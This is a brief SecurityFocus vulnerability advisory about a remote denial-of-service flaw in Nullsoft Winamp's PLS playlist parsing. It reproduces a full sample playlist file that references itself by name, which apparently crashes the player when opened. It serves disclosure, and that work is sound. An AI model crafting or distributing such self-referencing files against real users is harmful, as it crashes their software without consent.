Nullsoft Winamp PLS File Remote Denial of Service Vulnerability

A sample PLS file that demonstrates this issue was provided by X. It must be named the same as is specified in the File2 line, 'exploit.pls' in this case.

[playlist]
File1= A
Title1=exploit
Length1=-1
File2=exploit.pls
Title2=exploit
Length2=-1
NumberOfEntries=2
Version=2


The source to the original exploit is also available:


 

Privacy Statement
Copyright 2010, SecurityFocus